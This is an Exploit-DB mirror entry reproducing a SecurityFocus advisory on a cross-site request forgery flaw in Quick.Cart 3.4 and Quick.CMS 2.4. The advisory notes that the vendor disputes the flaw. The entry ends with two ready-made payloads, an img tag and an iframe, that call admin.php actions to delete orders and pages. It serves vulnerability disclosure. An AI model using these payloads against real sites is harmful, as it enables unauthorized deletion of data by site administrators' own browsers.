exploit-db-mirror/exploits/php/webapps/33375.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

14 lines
No EOL
773 B
Text

source: https://www.securityfocus.com/bid/37115/info
Quick.Cart and Quick.CMS are prone to a cross-site request-forgery vulnerability because the applications allow users to bypass certain security checks.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to an affected application, or delete certain data. Other attacks are also possible.
Quick.Cart 3.4 and Quick.CMS 2.4 are vulnerable; other versions may also be affected.
NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
<img
src="http://www.example.com/Quick.Cart/demo/admin.php?p=orders-delete&iOrder=2" />
<iframe
src="http://www.example.com/Quick.Cms/demo_lite/admin.php?p=p-delete&iPage=1"></iframe>